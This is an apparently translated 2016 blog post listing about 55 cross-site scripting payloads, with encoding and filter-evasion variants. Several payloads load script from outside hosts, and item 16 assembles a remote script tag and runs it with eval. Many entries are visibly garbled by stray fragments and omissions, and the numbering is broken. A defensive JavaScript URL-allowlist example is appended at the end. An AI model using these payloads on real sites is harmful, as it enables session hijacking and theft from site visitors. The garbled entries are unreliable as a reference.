XSS Attack Roundup

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless in China, since there is nowhere they can be exploited

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping past a JavaScript filter

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
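The URL-scheme tricks in items (3) to (14), (17) and (19) above all target the same weak spot: a filter that compares the raw attribute value against the literal string javascript:. The following is an added example, not code from the original post, of the normalize-then-allowlist check a defender uses instead; ALLOWED_SCHEMES is an assumed policy and the sample strings are constructed for the example.

```javascript
// Added example, not from the original post: an allowlist check for URL-valued
// attributes (IMG SRC, A HREF, LINK HREF, BODY BACKGROUND, CSS url() in HTML).
// It normalizes the obfuscations from the list above before deciding:
// mixed case, numeric HTML entities with or without semicolons, the
// &colon;/&Tab;/&NewLine; named entities, and embedded tab/CR/LF/NUL bytes.
// ALLOWED_SCHEMES is an assumed policy; adjust it to the application.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);
const NAMED = { colon: ":", Tab: "\t", NewLine: "\n" };

// Decode &#106; &#106 &#x6A; &#X6a and the three named entities above.
// (CSS backslash escapes such as \6a are not handled here.)
function decodeEntities(value) {
  return value
    .replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, code) => {
      const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
      return cp > 0x10ffff ? "" : String.fromCodePoint(cp);
    })
    .replace(/&(colon|Tab|NewLine);/g, (_, name) => NAMED[name]);
}

// Browsers drop tab/newline anywhere in a URL and leading/trailing C0 controls;
// old engines also tolerated NUL inside the scheme (java\0script). Stripping
// every C0 control plus space errs on the strict side. The result is only
// used for the decision, never written back into the page.
function normalizeUrl(value) {
  return decodeEntities(value).replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
}

// True for relative URLs and for allowlisted schemes; false for everything
// else (javascript:, vbscript:, data:, livescript:, unknown schemes).
function isSafeUrl(value) {
  const url = normalizeUrl(value);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  return m === null ? true : ALLOWED_SCHEMES.has(m[1]);
}

// Constructed samples following the payload shapes in the list above.
const SAMPLES = [
  "https://example.invalid/logo.png",
  "/static/logo.png",
  "JaVaScRiPt:alert('XSS')",
  "jav&#x09;ascript:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "java\u0000script:alert('XSS')",
];
for (const s of SAMPLES) console.log(isSafeUrl(s) ? "allow" : "block", JSON.stringify(s));
```

Run it with node; the first two samples are allowed and the remaining four are blocked.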